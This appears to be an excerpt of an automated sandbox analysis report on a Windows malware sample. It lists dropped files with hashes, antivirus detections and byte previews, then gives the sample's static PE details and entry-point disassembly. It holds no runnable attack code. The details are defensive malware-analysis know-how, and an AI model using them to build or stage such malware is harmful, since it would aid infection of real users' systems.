                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):40960
                                                                                                                                      Entropy (8bit):0.8553638852307782
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                      C:\Users\user\AppData\Local\Temp\B972.exe

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Windows\explorer.exe
                                                                                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                      Category:modified
                                                                                                                                      Size (bytes):78336
                                                                                                                                      Entropy (8bit):6.394001797252911
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:768:WPQkadQWo2lXlxiK/0PJMQ2VGhm9EGFDe8MRDiNfYg9TQRkAuHi5yvaIoFVr1VML:NBfdSKvVwDEhAuBhoL/MnJ0iXD46w0
                                                                                                                                      MD5:65AEAA0A0849CB3CE9BC15BCBF0B7B9F
                                                                                                                                      SHA1:BA7888FFDB978851F38C4CAC82D58D8CD9A6F077
                                                                                                                                      SHA-256:B139090C797214F88A2EA451289AB670000936C413CD2CD45AAA9895C78C63B5
                                                                                                                                      SHA-512:938CE106217E9CE98F104AF0913054070C2CC5791DFAA9902540CAEF923579B8DE0AF0ED720753BC40ADC75D7E286ACCDE7198315805331F25BE3F312C23F0BC
                                                                                                                                      Malicious:true
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                      Joe Sandbox View:
                                                                                                                                      • Filename: bCnarg2O62.exe, Detection: malicious, Browse
                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........v....................................b......b......b......Rich............PE..d......f.........."..........>.................@.............................p............`..................................................(...............P...............`.......................................................................................text...x........................... ..`.rdata...&.......(..................@..@.data...h....@......................@....pdata.......P......."..............@..@.reloc.......`.......0..............@..B................................................................................................................................................................................................................................................................................................................................

                                                                                                                                      C:\Users\user\AppData\Local\Temp\BCB3.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):28672
                                                                                                                                      Entropy (8bit):2.5793180405395284
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                                      MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                                      SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                                      SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                                      SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                      C:\Users\user\AppData\Local\Temp\BD9E.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):106496
                                                                                                                                      Entropy (8bit):1.1358696453229276
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                      MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                      SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                      SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                      SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                      C:\Users\user\AppData\Local\Temp\BE0D.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):49152
                                                                                                                                      Entropy (8bit):0.8180424350137764
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                      MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                      SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                      SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                      SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                      C:\Users\user\AppData\Local\Temp\BE5C.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):114688
                                                                                                                                      Entropy (8bit):0.9746603542602881
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                      C:\Users\user\AppData\Roaming\dcvjdff

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Windows\explorer.exe
                                                                                                                                      File Type:OpenPGP Public Key
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):290443
                                                                                                                                      Entropy (8bit):7.99935753281566
                                                                                                                                      Encrypted:true
                                                                                                                                      SSDEEP:6144:VUQAwuWARRouE1vwyfPJ8+4jxmRPgmkqVizJHw:VfBuRtx6sw
                                                                                                                                      MD5:1F911D56490B86E8D9FE65CF28C3D595
                                                                                                                                      SHA1:787675025A6AB2C2B67C31A5392B4C9C25DDE694
                                                                                                                                      SHA-256:EA2B540BE3FCB3A2708496922EC386928983D5A62355DF219557EA79C7BBFB78
                                                                                                                                      SHA-512:C0D7AF28B7C52B75A9D1F0231F3776B1FD7855CAE26B5DC8EE92A9826E40E551ECBD5BD94E97BAC27396D31D6442940BF975EDAFC210DA42E6EBB0B741436CA8
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.G..;{.xF..M....6..o.xh...I..A.....A.o.......oF.s~;.{.H-..#.....jZ.Z......p.3w.....FA.4.~..>..........F.7.......}.?..d@I<.?.i.2p."..z/.$.C...].Q..>..`......J.....H....u42....ZQ...X..eNg.4.a6....&.'.`.."....%.d.-4..Pk.R\....G.O.S.m..'./G...r.3_...c.b...k..;o..n.....=u.w.....X,.%...sZ{....D5....Z......U.Dr..Wy.m..kRs...?-....MDP.F.y...P..M..8J...#]......D........r9{..w;b.u.....x.h5...q...QP...hq:..x..-..].;x....u.(..xl.g....&-i#.m..yr.....%.Pp..v...dD.....k:......1+.......jR.Y..@..$..m....>+8..\.s...j...RH0...E.mu(..C....0...`7.}..p.7M.....$*...SA....;;.L...|....>.`..k.*....!'8...hI.....".W.v .B.yn...Y....n.1..B.p....O.~.._.K._.2..==M,S.h.5..H....X.."..V..&..y..D....L..Y+...S.bm..&.%....2o...3.C...T...I..._..T.9G].0n.a2.(.......?.d......oS......s.|.!.m.l....|_{."q..........4B.t./dr...j.'kU.X.....@).........B+H..M.s.F.k...q....F...g........zv......................sXfk..3....p..V.....N.j..Z.r.L..N.e.bo#...i..o....8..{.....j...(K.&...j;.t

                                                                                                                                      C:\Users\user\AppData\Roaming\hdhruer

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Windows\explorer.exe
                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):453632
                                                                                                                                      Entropy (8bit):6.352592573597842
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:Xv+T0hUr6WQIzmEpudCnKBzWhI3MLF9hv2Hx+3CtvjUiWElEy6BbO42T8:GYhUr672/gCnMWO8LFzv2RNvjU3NO4O
                                                                                                                                      MD5:366910063EF4A518B6ADF6D28C7B2C69
                                                                                                                                      SHA1:2A87028980742C1A86C8B5A356B8F379D4EA23E7
                                                                                                                                      SHA-256:0DC84955A94A98E04A933E66A3940BDCA12BCA73C41E2EB04D726B0AD28A8256
                                                                                                                                      SHA-512:0A473FEBB788BDCBBC8791334AC5EF705F5A875111FA9B579154DE5C1CB9A86FC92ABF77B29C7BD4EAA24D1F28C854FF3F4186C29E9FFA915A0F642B19CE3C33
                                                                                                                                      Malicious:true
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........io..............~.......~.......~.......p..........3....~.......~.......~......Rich............PE..L....$.e.............................;............@.........................................................................0...x.......................................................................@............................................text............................... ..`.rdata.............................@..@.data............`..................@....dilafav............................@..@.heciw..............................@..@.hirezep............................@....rsrc...............................@..@........................................................................................................................................................................................................................................................

                                                                                                                                      C:\Users\user\AppData\Roaming\jghruer

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Windows\explorer.exe
                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):454144
                                                                                                                                      Entropy (8bit):6.35347986015949
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:bTOLX6UHRWxXKNneVtVD/Gn9meVgd4w3sGz7A8gVy6BbO42T8:+r6UHoxaNneVtV5jz8s4NO4O
                                                                                                                                      MD5:A27775738FAFF754DCF5C3E8E42B9838
                                                                                                                                      SHA1:EF3BCDFBC99CA65CF6AE2B550DA3B9C4451DB2A7
                                                                                                                                      SHA-256:BA8FCBECAF19E5DA453AAFBCB716C6BA46980D64AD1C86CE17CEE7426C042BCC
                                                                                                                                      SHA-512:937EC056B76048653D1D2A8151B89551D1DFFFEC212177686DB6000104825397B1B97A9B153FB137A3C83FB53AFC3FC2810A1D4CD3663CF12EF34F5E6C41277A
                                                                                                                                      Malicious:true
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 29%
                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........io..............~.......~.......~.......p..........3....~.......~.......~......Rich............PE..L.....cd.............................;............@.................................I...........................................x...................................X...............................h...@............................................text............................... ..`.rdata..r...........................@..@.data............`..................@....saxaxi.............................@..@.losucu.............................@..@.rasiye.............................@....rsrc...............................@..@........................................................................................................................................................................................................................................................

                                                                                                                                      C:\Users\user\AppData\Roaming\jghruer:Zone.Identifier

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Windows\explorer.exe
                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):26
                                                                                                                                      Entropy (8bit):3.95006375643621
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:ggPYV:rPYV
                                                                                                                                      MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                      Malicious:true
                                                                                                                                      Preview:[ZoneTransfer]....ZoneId=0

                                                                                                                                      Static File Info

                                                                                                                                      General

                                                                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                      Entropy (8bit):6.35347986015949
                                                                                                                                      TrID:
                                                                                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                      File name:ctMI3TYXpX.exe
                                                                                                                                      File size:454'144 bytes
                                                                                                                                      MD5:a27775738faff754dcf5c3e8e42b9838
                                                                                                                                      SHA1:ef3bcdfbc99ca65cf6ae2b550da3b9c4451db2a7
                                                                                                                                      SHA256:ba8fcbecaf19e5da453aafbcb716c6ba46980d64ad1c86ce17cee7426c042bcc
                                                                                                                                      SHA512:937ec056b76048653d1d2a8151b89551d1dfffec212177686db6000104825397b1b97a9b153fb137a3c83fb53afc3fc2810a1d4cd3663cf12ef34f5e6c41277a
                                                                                                                                      SSDEEP:6144:bTOLX6UHRWxXKNneVtVD/Gn9meVgd4w3sGz7A8gVy6BbO42T8:+r6UHoxaNneVtV5jz8s4NO4O
                                                                                                                                      TLSH:53A4B00256F9AEA0F5F246328D2DF6E8A56DFC51EE58E757325CEB1F1B701A0C222311
                                                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........io..............~.......~.......~.......p..........3....~.......~.......~......Rich............PE..L.....cd...................

                                                                                                                                      File Icon

                                                                                                                                      Icon Hash:45254945454d410d

                                                                                                                                      Static PE Info

                                                                                                                                      General

                                                                                                                                      Entrypoint:0x403bf9
                                                                                                                                      Entrypoint Section:.text
                                                                                                                                      Digitally signed:false
                                                                                                                                      Imagebase:0x400000
                                                                                                                                      Subsystem:windows gui
                                                                                                                                      Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                      DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                                                      Time Stamp:0x64639EA7 [Tue May 16 15:17:59 2023 UTC]
                                                                                                                                      TLS Callbacks:
                                                                                                                                      CLR (.Net) Version:
                                                                                                                                      OS Version Major:5
                                                                                                                                      OS Version Minor:1
                                                                                                                                      File Version Major:5
                                                                                                                                      File Version Minor:1
                                                                                                                                      Subsystem Version Major:5
                                                                                                                                      Subsystem Version Minor:1
                                                                                                                                      Import Hash:cf2df69e8bb6acbf3b231da2c6f4bda2

                                                                                                                                      Entrypoint Preview

                                                                                                                                      Instruction
                                                                                                                                      call 00007FAB8881EFA9h
                                                                                                                                      jmp 00007FAB8881BEFEh
                                                                                                                                      push dword ptr [00451258h]
                                                                                                                                      call dword ptr [0040F12Ch]
                                                                                                                                      test eax, eax
                                                                                                                                      je 00007FAB8881C074h
                                                                                                                                      call eax
                                                                                                                                      push 00000019h
                                                                                                                                      call 00007FAB8881E88Bh
                                                                                                                                      push 00000001h
                                                                                                                                      push 00000000h
                                                                                                                                      call 00007FAB8881B830h
                                                                                                                                      add esp, 0Ch
                                                                                                                                      jmp 00007FAB8881B7F5h
                                                                                                                                      mov edi, edi
                                                                                                                                      push ebp
                                                                                                                                      mov ebp, esp
                                                                                                                                      sub esp, 20h
                                                                                                                                      mov eax, dword ptr [ebp+08h]
                                                                                                                                      push esi
                                                                                                                                      push edi
                                                                                                                                      push 00000008h
                                                                                                                                      pop ecx
                                                                                                                                      mov esi, 0040F3C0h
                                                                                                                                      lea edi, dword ptr [ebp-20h]
                                                                                                                                      rep movsd
                                                                                                                                      mov dword ptr [ebp-08h], eax
                                                                                                                                      mov eax, dword ptr [ebp+0Ch]
                                                                                                                                      pop edi
                                                                                                                                      mov dword ptr [ebp-04h], eax
                                                                                                                                      pop esi
                                                                                                                                      test eax, eax
                                                                                                                                      je 00007FAB8881C07Eh
                                                                                                                                      test byte ptr [eax], 00000008h
                                                                                                                                      je 00007FAB8881C079h
                                                                                                                                      mov dword ptr [ebp-0Ch], 01994000h
                                                                                                                                      lea eax, dword ptr [ebp-0Ch]
                                                                                                                                      push eax
                                                                                                                                      push dword ptr [ebp-10h]
                                                                                                                                      push dword ptr [ebp-1Ch]
                                                                                                                                      push dword ptr [ebp-20h]
                                                                                                                                      call dword ptr [0040F160h]
                                                                                                                                      leave
                                                                                                                                      retn 0008h
                                                                                                                                      mov edi, edi
                                                                                                                                      push ebp
                                                                                                                                      mov ebp, esp
                                                                                                                                      push ecx
                                                                                                                                      push ebx
                                                                                                                                      mov eax, dword ptr [ebp+0Ch]
                                                                                                                                      add eax, 0Ch
                                                                                                                                      mov dword ptr [ebp-04h], eax
                                                                                                                                      mov ebx, dword ptr fs:[00000000h]
                                                                                                                                      mov eax, dword ptr [ebx]
                                                                                                                                      mov dword ptr fs:[00000000h], eax
                                                                                                                                      mov eax, dword ptr [ebp+08h]
                                                                                                                                      mov ebx, dword ptr [ebp+0Ch]
                                                                                                                                      mov ebp, dword ptr [ebp-04h]
                                                                                                                                      mov esp, dword ptr [ebx-04h]
                                                                                                                                      jmp eax
                                                                                                                                      pop ebx
                                                                                                                                      leave
                                                                                                                                      retn 0008h
                                                                                                                                      pop eax
                                                                                                                                      pop ecx
                                                                                                                                      xchg dword ptr [esp], eax
                                                                                                                                      jmp eax
                                                                                                                                      pop eax
                                                                                                                                      pop ecx
                                                                                                                                      xchg dword ptr [esp], eax
                                                                                                                                      jmp eax
                                                                                                                                      pop eax
                                                                                                                                      pop ecx
                                                                                                                                      xchg dword ptr [esp], eax
                                                                                                                                      jmp eax

                                                                                                                                      Rich Headers

                                                                                                                                      Programming Language:
                                                                                                                                      • [ASM] VS2010 build 30319
                                                                                                                                      • [C++] VS2010 build 30319
                                                                                                                                      • [ C ] VS2010 build 30319
                                                                                                                                      • [IMP] VS2008 SP1 build 30729
                                                                                                                                      • [RES] VS2010 build 30319
                                                                                                                                      • [LNK] VS2010 build 30319

                                                                                                                                      Data Directories

                                                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x49ae00x78.rdata
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x600000x1f108.rsrc
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x49b580x1c.rdata
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x490680x40.rdata
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0xf0000x1fc.rdata
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                      Sections

                                                                                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                      .text0x10000xd4dd0xd600c643eea5aef12fcfd7be843cbfe6445eFalse0.6018910630841121data6.671297397200401IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                      .rdata0xf0000x3b6720x3b800ee8e72efdf963d859c9aeaa4ae95d831False0.7518546481092437data6.868582189296561IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                      .data0x4b0000x11cc00x600031f5596484b4beb598ad2843fc87cb5bFalse0.0838623046875data1.091277368418054IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                      .saxaxi0x5d0000x4000x4000f343b0931126a20f133d67c2b018a3bFalse0.0166015625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                      .losucu0x5e0000xd60x200bf619eac0cdf3f68d496ea9344137e8bFalse0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                      .rasiye0x5f0000x4000x4000f343b0931126a20f133d67c2b018a3bFalse0.0166015625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                      .rsrc0x600000x1f1080x1f200ed98b720f1c3ff3a2761a26875f38bf5False0.4244791666666667data5.043758495644137IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                                      Resources

                                                                                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                      RT_CURSOR0x79b780x330Device independent bitmap graphic, 48 x 96 x 1, image size 00.1948529411764706
                                                                                                                                      RT_CURSOR0x79ea80x130Device independent bitmap graphic, 32 x 64 x 1, image size 00.33223684210526316
                                                                                                                                      RT_CURSOR0x7a0000xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.2953091684434968
                                                                                                                                      RT_CURSOR0x7aea80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.46705776173285196
                                                                                                                                      RT_CURSOR0x7b7500x568Device independent bitmap graphic, 16 x 32 x 8, image size 00.5361271676300579
                                                                                                                                      RT_CURSOR0x7bce80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.30943496801705755
                                                                                                                                      RT_CURSOR0x7cb900x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.427797833935018
                                                                                                                                      RT_CURSOR0x7d4380x568Device independent bitmap graphic, 16 x 32 x 8, image size 00.5469653179190751
                                                                                                                                      RT_ICON0x60ac00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TamilIndia0.3694029850746269
                                                                                                                                      RT_ICON0x60ac00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TamilSri Lanka0.3694029850746269
                                                                                                                                      RT_ICON0x619680x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TamilIndia0.4553249097472924
                                                                                                                                      RT_ICON0x619680x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TamilSri Lanka0.4553249097472924
                                                                                                                                      RT_ICON0x622100x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TamilIndia0.4619815668202765
                                                                                                                                      RT_ICON0x622100x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TamilSri Lanka0.4619815668202765
                                                                                                                                      RT_ICON0x628d80x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TamilIndia0.4552023121387283
                                                                                                                                      RT_ICON0x628d80x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TamilSri Lanka0.4552023121387283
                                                                                                                                      RT_ICON0x62e400x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TamilIndia0.2682572614107884
                                                                                                                                      RT_ICON0x62e400x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TamilSri Lanka0.2682572614107884
                                                                                                                                      RT_ICON0x653e80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TamilIndia0.3074577861163227
                                                                                                                                      RT_ICON0x653e80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TamilSri Lanka0.3074577861163227
                                                                                                                                      RT_ICON0x664900x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilIndia0.3599290780141844
                                                                                                                                      RT_ICON0x664900x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilSri Lanka0.3599290780141844
                                                                                                                                      RT_ICON0x669600xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TamilIndia0.5690298507462687
                                                                                                                                      RT_ICON0x669600xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TamilSri Lanka0.5690298507462687
                                                                                                                                      RT_ICON0x678080x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TamilIndia0.5473826714801444
                                                                                                                                      RT_ICON0x678080x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TamilSri Lanka0.5473826714801444
                                                                                                                                      RT_ICON0x680b00x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TamilIndia0.6163294797687862
                                                                                                                                      RT_ICON0x680b00x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TamilSri Lanka0.6163294797687862
                                                                                                                                      RT_ICON0x686180x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TamilIndia0.4631742738589212
                                                                                                                                      RT_ICON0x686180x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TamilSri Lanka0.4631742738589212
                                                                                                                                      RT_ICON0x6abc00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TamilIndia0.4873358348968105
                                                                                                                                      RT_ICON0x6abc00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TamilSri Lanka0.4873358348968105
                                                                                                                                      RT_ICON0x6bc680x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TamilIndia0.4930327868852459
                                                                                                                                      RT_ICON0x6bc680x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TamilSri Lanka0.4930327868852459
                                                                                                                                      RT_ICON0x6c5f00x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilIndia0.4512411347517731
                                                                                                                                      RT_ICON0x6c5f00x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilSri Lanka0.4512411347517731
                                                                                                                                      RT_ICON0x6cac00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TamilIndia0.3784648187633262
                                                                                                                                      RT_ICON0x6cac00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TamilSri Lanka0.3784648187633262
                                                                                                                                      RT_ICON0x6d9680x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TamilIndia0.5058664259927798
                                                                                                                                      RT_ICON0x6d9680x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TamilSri Lanka0.5058664259927798
                                                                                                                                      RT_ICON0x6e2100x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TamilIndia0.5599078341013825
                                                                                                                                      RT_ICON0x6e2100x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TamilSri Lanka0.5599078341013825
                                                                                                                                      RT_ICON0x6e8d80x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TamilIndia0.583092485549133
                                                                                                                                      RT_ICON0x6e8d80x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TamilSri Lanka0.583092485549133
